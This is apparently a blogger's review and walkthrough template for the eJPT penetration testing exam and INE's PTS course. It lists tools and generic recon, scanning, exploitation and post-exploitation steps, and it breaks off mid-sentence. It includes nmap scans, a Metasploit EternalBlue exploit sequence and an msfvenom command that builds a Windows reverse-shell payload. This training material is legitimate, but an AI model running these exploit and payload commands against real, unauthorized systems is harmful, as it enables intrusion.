Introduction eJPT
I highly encourage anyone trying to break into pentesting to take the PTS course provided by INE. This course will teach you about Reconnaissance, Enumeration, Metasploit, Building Payloads, Exploits, Pivoting, Cyber Security Frameworks, Open Source Resources, and different techniques that are useful for an introduction to penetration testing. You will get to utilize tools in a sandboxed environment while learning from Alexis Ahmed in detail what's going on. If you truly are a beginner like I was, stuff will start clicking as you continue deeper into the course and utilize other resources.
In this course you will set up a PostgreSQL database with MSFconsole for creating a smooth workflow, brute force services to enumerate user credentials, learn protocols, utilize nmap in different ways to get more information about systems depending on firewalls and other variables, exploit machines using MSFconsole, learn pivoting basics, crack hashes, use whois, Google dorks, Web Developer tools, etc. I hope you enjoy this course as much as I did. There are over 150 hours of content for eJPTv2.
Target Information
Target URL/Host: www.example.com
Description: A brief description of the target, including the environment, network configuration, and any relevant background info.
Tools Used
- Burp Suite - Web application security testing tool
- Metasploit - Exploitation framework
- nmap - Network scanner
- NetCat - Listener
- John the Ripper - Hash cracker
- Dirb - Directory and file brute-forcing tool
- Hydra - Password cracking tool
- Web Developer Tools - Manual Exploitation
Pentesting Walkthrough
Step 1: Reconnaissance
In this phase, we collect as much information as possible about the target to plan our next steps. We use tools like nmap for network scanning and whois to gather domain information.
Step 2: Scanning and Enumeration
Here we identify open ports, services, and potential vulnerabilities. For example:
nmap -F target_ip
nmap -p- -sV -O --min-rate packets_per_second target_ip -oX OutputFile
nmap -p 445 --script=smb-* target_ip
We can also use dirb for directory enumeration on web servers (the wordlist is passed as the second argument):
dirb http://example.com /path/to/wordlist
If HTTP servers are identified, we can also use tools like:
- Nikto
- Burp Suite
- OWASP ZAP
- Manual Scanning
- Developer Tools
Step 3: Exploitation
Once we have identified vulnerabilities, we attempt exploitation. In this example, we use Metasploit to exploit a vulnerable service.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS targetip
run
You may also try utilizing MSFvenom to create payloads:
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=localip LPORT=port -f exe > filename
Step 4: Post-Exploitation
After successfully exploiting the target, we maintain access or gather additional information. We can use Meterpreter to explore the compromised system further.
In this exam, you will have the chance to try to dump hashes, crack hashes, pivot, and enumerate more information. You will be given a couple of flags to track down for answering a few questions.
Results
Here we provide a summary of the results from our pentesting efforts. This includes any successful exploits, data accessed, and any issues discovered during the testing.
When going into the eJPT PTS exam you can expect to see everything in the course, but a notch higher in difficulty. You will have 48 hours to compromise a few machines and enumerate a subnet. You have 35 questions to answer regarding different vectors, a few CTFs, credentials, and exploits utilized to compromise machines. You should come out of this exam with your head held high knowing that if you passed you now have the ability to dive deeper into other courses with a good baseline understanding of what's going on. You have utilized tools and multiple techniques that are relevant to penetration testing in the real world.
Conclusion
After completing the penetration test, we conclude with recommendations for securing the system and improving the target's overall security posture. This was just a sandboxed environment for an exam. From here moving forward, I would encourage utilizing other platforms to exercise and enhance your skills. You can continue moving forward with INE's eCPPT & eWPT courses or feel free to check out
